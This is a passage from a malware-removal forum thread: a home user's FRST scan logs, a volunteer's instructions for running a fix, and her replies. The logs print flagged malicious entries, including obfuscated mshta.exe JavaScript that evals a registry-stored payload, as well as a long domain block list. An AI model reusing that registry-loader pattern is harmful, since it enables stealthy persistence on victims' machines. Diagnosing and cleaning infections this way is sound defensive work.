2017-01-11 17:07 - 2016-12-07 20:04 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00037200 _____ () C:\Program Files (x86)\Dropbox\Client\windisplaytoast.compiled._DisplayToast.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00024920 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00546104 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2016-12-16 15:55 - 2016-12-16 15:55 - 63810560 _____ () C:\Users\Dorraine\AppData\Local\0bdc3b3d63\libcef.dll
2016-12-16 15:56 - 2016-12-16 15:56 - 17561280 _____ () C:\Users\Dorraine\AppData\Local\0bdc3b3d63\plugins\pepflashplayer32_21_0_0_242.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\3befe: "C:\WINDOWS\system32\mshta.exe" "javascript:xo1HK5M="i2z";l7I2=new ActiveXObject("WScript.Shell");kB7uBa3="b4Nsza";J3iVy2=l7I2.RegRead("HKCU\\software\\fnbc\\szon");PI7TM6="I1PHTLV";eval(J3iVy2);gh4Qj0c="DT5h";" <===== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\e30a8741: "C:\WINDOWS\system32\mshta.exe" "javascript:YgjdAp2="tW";F5b=new ActiveXObject("WScript.Shell");yCFFDJ5i="c";a6wXv2=F5b.RegRead("HKCU\\software\\ycqzblx\\isbkuu");XgoRnR5L7="BEfn";eval(a6wXv2);TXVMr6="W2";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\localhost -> localhost
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0411dd.com -> 0411dd.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0511zfhl.com -> 0511zfhl.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0632qyw.com -> 0632qyw.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1001movie.com -> 1001movie.com

There are 6091 more sites.


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: WsAppService => 2
HKLM\...\StartupApproved\Run32: => "Aimersoft Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\StartupApproved\Run: => "Spotify Web Helper"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [{B163DA3D-355A-40AD-BEE9-9FB9E2C152FF}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D0CE8B62-B6BC-4673-A410-6A2F045F14CD}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D1F7E853-6C1A-4009-91E8-74231D828776}] => C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{7FC2EB58-0005-4FBA-8C88-D848CEF76D2F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{66E30416-1ECD-4FC1-B535-9FC79A3BFB79}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{D5DB3676-ADA6-444D-BF97-303E16719040}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{150A971D-796E-460A-9946-4D0DB57590F0}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{8F5D07E7-6D45-4C5C-9037-05DAD0A27745}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{FB15462A-A1F4-4E72-B28A-62B359F2D74F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{56076514-A7BE-4A47-B536-6C1658DBA05D}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{4F454C47-904F-4370-B007-FA372696CB67}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{1F425925-0F49-4E3A-9EFB-4164F18CAF22}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{6796C32A-D4FC-4F07-A7CA-74B6A1718A64}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{59AD021A-028E-4125-B679-AA29F604379C}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [TCP Query User{3312017F-DCA5-45EB-A03A-8F7CF93AA496}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{40346371-22B6-4E45-B2EA-4CFFF0CA8709}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{1273B45E-EB79-4706-A0EA-96B31F17F496}C:\users\dorraine\appdata\roaming\spotify\spotify.exe] => C:\users\dorraine\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{D21F287F-8980-4A80-BD50-55EA7519F7F5}C:\users\dorraine\appdata\roaming\spotify\spotify.exe] => C:\users\dorraine\appdata\roaming\spotify\spotify.exe
FirewallRules: [{73E3D461-EE06-40E4-ACB7-63AA2FA38FFC}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{F2AC9C5B-DB98-4E25-9F59-780FE583C00C}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{D845F3E0-1651-4A9E-983B-DBFFE9E31753}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{709A9412-72DC-483D-82D9-E2DC27C0D0D1}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{B9F440A3-7187-4E55-85CB-EB2031F83E61}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{3A4F7DDD-6F1B-4DF7-B0BC-CFB9F537A410}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{746098AE-C767-4ED8-BFE9-2276C9566D7A}C:\program files (x86)\teamviewer\teamviewer.exe] => C:\program files (x86)\teamviewer\teamviewer.exe
FirewallRules: [UDP Query User{887C56BC-951B-4C94-A7B5-8281095FE2E1}C:\program files (x86)\teamviewer\teamviewer.exe] => C:\program files (x86)\teamviewer\teamviewer.exe
FirewallRules: [{DB74BBB2-F2EF-473E-AE7F-ECC8211B3850}] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe

==================== Restore Points =========================


==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/13/2017 03:49:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Hearts.scr, version: 4.0.2.0, time stamp: 0x4ce3174b
Faulting module name: Flash.ocx_unloaded, version: 24.0.0.186, time stamp: 0x584c9498
Exception code: 0xc0000005
Fault offset: 0x00de46b0
Faulting process id: 0x1bd9c
Faulting application start time: 0x01d26dc86c5f0f33
Faulting application path: C:\WINDOWS\system32\Hearts.scr
Faulting module path: Flash.ocx
Report Id: 09470664-c0fe-4634-9d1c-eae50171025d
Faulting package full name:
Faulting package-relative application ID:

Error: (01/12/2017 11:44:26 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Hearts.scr, version: 4.0.2.0, time stamp: 0x4ce3174b
Faulting module name: Flash.ocx_unloaded, version: 24.0.0.186, time stamp: 0x584c9498
Exception code: 0xc0000005
Fault offset: 0x00de46b0
Faulting process id: 0x14ad4
Faulting application start time: 0x01d26d5439fe7b94
Faulting application path: C:\WINDOWS\system32\Hearts.scr
Faulting module path: Flash.ocx
Report Id: 21ab2645-66c1-472d-a20e-4e285a8e2653
Faulting package full name:
Faulting package-relative application ID:

Error: (01/12/2017 09:27:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Hearts.scr, version: 4.0.2.0, time stamp: 0x4ce3174b
Faulting module name: Flash.ocx_unloaded, version: 24.0.0.186, time stamp: 0x584c9498
Exception code: 0xc0000005
Fault offset: 0x00de46b0
Faulting process id: 0x137f8
Faulting application start time: 0x01d26d43f02d9edc
Faulting application path: C:\WINDOWS\system32\Hearts.scr
Faulting module path: Flash.ocx
Report Id: 7674ac2f-9f27-44ec-9545-9de77fb9ea2b
Faulting package full name:
Faulting package-relative application ID:

Error: (01/11/2017 09:40:14 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.BingWeather_8wekyb3d8bbwe!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/11/2017 05:07:31 PM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.

Error: (01/11/2017 05:07:22 PM) (Source: DbxSvc) (EventID: 293) (User: )
Description: Failed to validate client process executable is signed: C:\Program Files (x86)\Dropbox\Client_17.4.33\Dropbox.exe

Error: (01/11/2017 05:07:22 PM) (Source: DbxSvc) (EventID: 282) (User: )
Description: Certificate mismatch for file: C:\Program Files (x86)\Dropbox\Client_17.4.33\Dropbox.exe

Error: (01/11/2017 01:17:44 PM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.

Error: (01/10/2017 10:23:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 10:18:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (01/13/2017 08:31:39 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.

Error: (01/13/2017 08:31:34 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.

Error: (01/13/2017 08:31:34 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.

Error: (01/13/2017 05:04:43 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.

Error: (01/13/2017 03:58:05 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.

Error: (01/13/2017 02:53:25 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.

Error: (01/13/2017 01:22:10 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.

Error: (01/13/2017 12:03:39 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.

Error: (01/13/2017 12:02:34 AM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy SID (S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742). This security permission can be modified using the Component Services administrative tool.

Error: (01/12/2017 09:49:42 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.


==================== Memory info ===========================

Processor: AMD Athlon™ II X2 240 Processor
Percentage of memory in use: 79%
Total physical RAM: 3838.97 MB
Available physical RAM: 788.42 MB
Total Virtual: 7678.97 MB
Available Virtual: 3535.87 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.22 GB) (Free:433.17 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: BF18BF18)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

==================== End of Addition.txt ============================


  • 0

#7
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

NO.

 

1.  Download the fixlist.txt file to the same folder as FRST.exe or FRST64.exe

 

2.  Right click on FRST.exe or FRST64.exe.  Select Run As Administrator.

 

3.  Once the program comes up DO NOT PRESS THE SCAN BUTTON.  Instead press FIX.

 

4.  If it tells you it can't find the fixlist file then you did not put it in the same folder.  Find the fixlist file and move it to the same folder and try again.

 

5.  It will finish and generate a fixlog.txt file which is what I want to see.


  • 0

#8
preacherswife

preacherswife

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 193 posts

I'm so very sorry but I am not able to fully understand what you are asking me to do.  Here is what I have done so far...

 

I have downloaded the FRST file.  It went to "Downloads."  From there I d/led the Fixtext file and it went to "Downloads" as well.  I have both logs of the Fixlist saved in  "Downloads." 

 

I am not computer savvy so this is confusing to me.
 


  • 0

#9
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP
2.  Right click on FRST.exe or FRST64.exe.  Select Run As Administrator.
 
3.  Once the program comes up DO NOT PRESS THE SCAN BUTTON.  Instead press FIX.
 
 
 
5.  It will finish and generate a fixlog.txt file which is what I want to see.

  • 0

#10
preacherswife

preacherswife

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 193 posts

I certainly hope this is what you need.  In my "Downloads," I found what was called FRST and Addition and it under the heading called "Type" it was called "text document."  I have right clicked on both of those and it went to "Notepad."  From there, I copied them and have posted them on here. 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-01-2017
Ran by Dorraine (administrator) on DORRAINE-PC (13-01-2017 20:30:42)
Running from C:\Users\Dorraine\Downloads
Loaded Profiles: Dorraine & DefaultAppPool (Available Profiles: Dorraine & DefaultAppPool)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Microsoft Corporation) C:\Windows\System32\DataExchangeHost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\w3wp.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-26] (Microsoft Corporation)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [26287016 2017-01-05] (Dropbox, Inc.)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2001920 2014-04-04] (AimerSoft)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-08-06] (SUPERAntiSpyware)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [Spotify Web Helper] => C:\Users\Dorraine\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1525360 2016-05-15] (Spotify Ltd)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\RunOnce: [Uninstall C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Hearts.scr [679936 2016-01-25] (ScreenTime Media)
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
